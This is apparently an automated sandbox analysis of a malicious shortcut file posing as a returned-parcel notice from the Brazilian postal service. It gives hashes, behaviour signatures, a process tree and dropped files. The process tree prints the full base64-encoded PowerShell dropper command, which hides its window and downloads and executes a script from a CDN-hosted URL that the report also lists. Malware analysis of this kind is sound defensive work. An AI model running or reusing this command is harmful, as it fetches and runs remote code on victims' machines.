f37082455c2af0cba715743d283281af61d94ff1ca6d1f1446dd02623e1b2aa0

General

Target

Mercadoria_Devolvida-Correios-8E7ABAG7.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2524	powershell.exe
6	2524	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2524	powershell.exe
2524	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2524	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1972 wrote to memory of 2524	1972	cmd.exe	29
PID 1972 wrote to memory of 2524	1972	cmd.exe	29
PID 1972 wrote to memory of 2524	1972	cmd.exe	29
PID 2524 wrote to memory of 2804	2524	powershell.exe	30
PID 2524 wrote to memory of 2804	2524	powershell.exe	30
PID 2524 wrote to memory of 2804	2524	powershell.exe	30
PID 2804 wrote to memory of 2612	2804	csc.exe	31
PID 2804 wrote to memory of 2612	2804	csc.exe	31
PID 2804 wrote to memory of 2612	2804	csc.exe	31

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-8E7ABAG7.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1972
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\phiq5bte.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D42.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1D41.tmp"
      4⤵
      PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES1D42.tmp

Filesize
1KB

MD5
4b791cd0198984a6a311d525a86a39bf

SHA1
550dc60e2d62e755afffbe3b6a67861943da4242

SHA256
079dabd01fede4ebf28972f34bf1445e70ee13d7d1f57bd7fd574d0d093fea3e

SHA512
928925da2271e8e7b4f686c63f597b19bab1aa6030b3e8ff98f39080c6e335493d242b10840711b52b68523783dea293ca181449a0673625194375ba34549480

Download Submit
C:\Users\Admin\AppData\Local\Temp\phiq5bte.dll

Filesize
3KB

MD5
75c19e64608dd35d9a39826573c0da36

SHA1
e62e37b837f0ca36b234974040de55b8267d889c

SHA256
f2fd313a8d74bc2b3b844fb5be9a8d0b01c7248e5854f646aacd9f8745e1bf72

SHA512
ebf8e7b1f1f831bd8b58341773d26fc7be1fc03ae2e9f67ef2b3919e871d5ce68ba9837647e357cfbe2a65170053d520863cc5d12d3f58ba805559e1fae36974

Download Submit
C:\Users\Admin\AppData\Local\Temp\phiq5bte.pdb

Filesize
7KB

MD5
f8b2b1efd13c14d7506c218cf2ff5a12

SHA1
7f15861267d9fd216290c63229114777fe46460d

SHA256
eb00208cda2487289f29749565061328ac9ddb4aec3c1f8ce04eab3d900a67f1

SHA512
77f4f87d2b32e686aa881d37d9ba3725c6b13cc553fa56c8aa07d4f2db5e2b9d4009438a060a9a09eddbfdcb46902b21f2af092e5ebd5de8abf4b0b07b95b214

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1D41.tmp

Filesize
652B

MD5
d464b3060ba56f5342eceedcae351a7c

SHA1
617093252c5e686447548bcba25a099641569d3b

SHA256
ae42e06074fccff3f26a537ad42343f2d146023c541279ae4e62383fd7317de7

SHA512
8720a874df35040dbf99ae25dd0ecc207d643ce7bf687bebf2e4a2d08bf01526a5d27f401ab0145558d7b27838b6e32dde48952098c2b0245aa8adb03fc6243a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\phiq5bte.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\phiq5bte.cmdline

Filesize
309B

MD5
164b9616d0e8a32d012595b7b8e54f1d

SHA1
c2167a7fdb108e5ce40702c6ad018c79e6a2cb7f

SHA256
946e3b46e9717bd0ed9778988f3f30700db4d104d2dff92cd93d082d872b8b8c

SHA512
5ba382aaa9a81b6f654539f4035414a007457252b0fec1f732596235de3a58b7ead541ff5bd7bf1240c3ba98e6c1918d385ec9369f19b54962e9b351316804fe

Download Submit
memory/2524-44-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-49-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-38-0x000007FEF5E8E000-0x000007FEF5E8F000-memory.dmp

Filesize
4KB

Download
memory/2524-43-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-42-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-59-0x0000000002AE0000-0x0000000002AE8000-memory.dmp

Filesize
32KB

Download
memory/2524-41-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2524-40-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-39-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/2524-62-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing